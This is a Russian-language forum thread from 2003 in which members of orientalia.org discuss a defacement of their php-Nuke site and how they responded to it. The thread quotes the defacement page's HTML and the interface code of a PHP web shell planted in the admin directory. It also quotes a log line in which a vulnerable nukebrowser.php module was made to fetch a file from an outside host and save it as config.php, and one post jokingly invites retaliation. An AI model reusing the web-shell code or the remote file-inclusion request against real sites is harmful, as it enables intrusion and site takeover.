Проблемы безопасности

[Пламен]

28 января, с 2:49 до 5:30 GMT orientalia.org и iztok.net стали объектом хакерской атаки. Config файл был заменен на демоническую картинку и сообщение связаться с тем, кто это якобы сделал.

Возможно это уязвимости движка php-Nuke, но возможны и другие причины. Вопрос исследуется системными администраторами.

Кому интересно, что там было в сообщении и как выглядит дьявол, может скопировать сорс и записать как html

Код Выделить Развернуть

<table width="97%" border="0" align="center" cellpadding="2" cellspacing="0">
                   <tr>
                     <td><font class="content"><font class="content"><strong><big>&middot;</big></strong><a href="HTTP/1.1 200 OKDate: Tue, 28 Jan 2003 02:49:46 GMTServer: ApacheX-Powered-By: PHP/4.2.3Connection: closeContent-Type: text/html<html>  <head>    <title># P()W # Pirates of NetWork ownz r b0x.. # P()W #</title>    <style type="text/css">      a{text-decoration:none}      a:hover{color=black}    </style>  </head>  <body text="black" bgcolor="white" link="#808080" alink="#808080" vlink="#808080" oncontextmenu="return false" ondragstart="return false" onselectstart="return false">    <font face="fixedsys"><center>    <table width="90%" border="0"><tr><td>      $ id;uname -a      <br>uid=512(apache) gid=512(apache) groups=512(apache)      <br>sh: /bin/uname: Permission denied      <br>$ echo permission denied? u fuckin mother fucker... > /dev/null      <br>$ cat HACKMSG    </td></tr></table>    <br><img width="225" height="305" src="http://www.xdeposit.hpg.com.br/demon.jpg">    <br>    <br>We are: <u>Havenard</u> :: Tw1STer :: Spectroman :: w4r10ck    <br>Contact: <a href="mailto:pnw@linuxmail.org">p<u>nw@linuxmail.or</u>g</a>,    <a href="http://www.pnw-br.org"><u>www.</u>p<u>nw-br.or</u>g</a><br>    <table width="90%" border="0"><tr><td>      <br>$ echo good bye admin! new vulnerabilities rules.. > /dev/null      <br>$ exit    </td></tr></table>  </body></html>" target="new"># P()W # Pirates of NetWork ownz r b0x.. # P()W #</a><br>
</font></td>
                   </tr>
                 </table>

[КИ]

Я успел видеть картинку.
Попахивает черной магией, которой не раз уже пугали последователи одного интересного культа, подвергавшегося мягкой критике .

[Пламен]

вот она картинка:

Код Выделить Развернуть

http://www.xdeposit.hpg.com.br/demon.jpg

Сисадмины на все 100% уверены, что хакери залезли через формы сообщений - либо на форуме, либо в комментариях под статьями, либо via личные сообщения, если это регистрированный юзер.

Я запретил анонимные комментарии к статьям, то же самое сделаю и с форумами. Кто хочет писать, пусть регистрируется и укажет домашнюю страницу. Нельзя больше рисковать. WebMail наверное тоже удалю, так что подношу свои извинения всем, кому был открыт счет uname@orientalia.org.

[КИ]

Еще стоит запретить html-код в любых сообщениях.

Еще стоит запретить html-код в любых сообщениях.

Еще стоит запретить html-код в любых сообщениях.

Еще стоит запретить html-код в любых сообщениях.

Еще стоит запретить html-код в любых сообщениях.

* * *
Интересно, почему эта сутра не выявляется. :?:

[Пламен]

Непонятно, почему мое сообщение открывается, а ваше, Хуанди, не открывалось. Вы через реплику писали или reply использовали?

[КИ]

Всегда использую окошко внизу - так намного быстрее. Линки sutraxxxx  у меня тоже не всегда работают.

Это сообщение я отредактировал, если что.

[КИ]

А это для теста - нерадактированое, может пригодится

[Пламен]

Вчера поздним вечером был подменен и index.php, т.е. основной файл сайта.

[Пламен]

И еще обнаружил странный .php файл в администраторской директории. Очевидно экзекутивный. Содержит вот такую вещь:

Код Выделить Развернуть

  <table width="100%" border="0" cellpadding="0" cellspacing="0">
     <tr>
       <td align="left" valign="top">
         <form method="post" name="terminal" action="<? echo $PHP_SELF; ?>" target="_self">
           Directory:<br>
           <input type="text" name="changedir" size="50"<?if (isset($changedir)) echo " value=\"$changedir\""; ?>><br><br>
           Command:<br>
           <input type="text" name="command" size="50">
           <input type="submit" value="Execute"><br>
           <input type="checkbox" name="stderr"<? if (isset($stderr)) echo " checked"; ?>> Enable stderr-trappin
         </form>
       </td>
    </tr>
 </table>

[ADept]

мда.. кто-то упражняется в хакерстве %))
закройте доступ в библиотеку..

[Пламен]

И продолжает упражняться. Час тому назад висела картинка (ее не было видно), но на португальском было написано: "Так бывает с теми, кто нас критикует!" - и адрес какого-то бразильского сайта!?

[ADept]

дети - не ведают, что творят..

[Пламен]

Закрыл всем анонимным вход в разделы, где можно информацию подавать и записывать на сайте. Действительно неясно, кому мы так мешаем и чем.

[КИ]

Я думаю это очередная попытка дискредитировать ваджраяну со стороны хакеров-христиан :)Я думаю это очередная попытка дискредитировать ваджраяну со стороны хакеров-христиан

[КИ]

В чат под названием Dharma где мы с ГК и кажется Nick'ом (?) о чем-то болтали вошел парень венесуэлец. Он нашел чат через поиск, ища название своей любимой бразильской баскетбольной комманды DHARMA. Он решил, что в этом чате какие-то наглые турки (ie имеет обыкновение принимать кририлицу за турецкий язык) ругают его комманду. ГК все ему популярно объснил и даже подружился.

[Irina]

Подруга сказала, что по всему миру сейчас идут хакерские атаки. Какой-то вирус. Вроде российские провайдеры ставят какой-то заслон этому вирусу. Так она слышала.
Поинтересовалась, этот сервер в Болгарии расположен или где.

Я описала хакерскую картинку на сайте, которую видела. Она сказала, что "вот-вот именно эта картинка".

Так что м.б. это и не наши личные враги, а обчественные.

Воттт...

[Bodhichen]

Хуанди, ваджраяну бы не трогал. Дружил бы хозяин сайта с ваджраяной , проблем бы не было. А так блуждают все кому попало, от Пируна до Дурги.. вот и колбасит.

[ADept]

Бодхи - Протекторат ?! -))))))))

[Пламен]

Никакой это не вирус, а лоха, т.е. дыра в модулях, точнее, в Переводчике сайтов.

Вот что этот парень из Бразилии делал ровно в 14:53 GMT, когда подменил конфиг

Код Выделить Развернуть

200.158.15.152 - - [30/Jan/2003:22:53:41 +0800] "GET /nukebrowser.php?filnavn=url&filhead=http://www.twinhead.com.br/havenard/filesend.txt&path=http://www.pnw-br.org/index.html&save=config.php HTTP/1.1" 200 5971 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
Тут и его два сайта. Кто хочет и может возмездие устроить, пожалуйста, ему все карты в руки. :-)

[Пламен]

Никакой это не вирус, а лоха, т.е. дыра в модулях, точнее, в Переводчике сайтов.

Вот что этот парень из Бразилии делал ровно в 14:53 GMT, когда подменил конфиг

Код Выделить Развернуть

200.158.15.152 - - [30/Jan/2003:22:53:41 +0800] "GET /nukebrowser.php?filnavn=url&filhead= http://www.twinhead.com.br/havenard/filesend.txt &path=http://www.pnw-br.org/index.html &save=config.php HTTP/1.1" 200 5971 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
Тут и его два сайта. Кто хочет и может возмездие устроить, пожалуйста, ему все карты в руки. :-)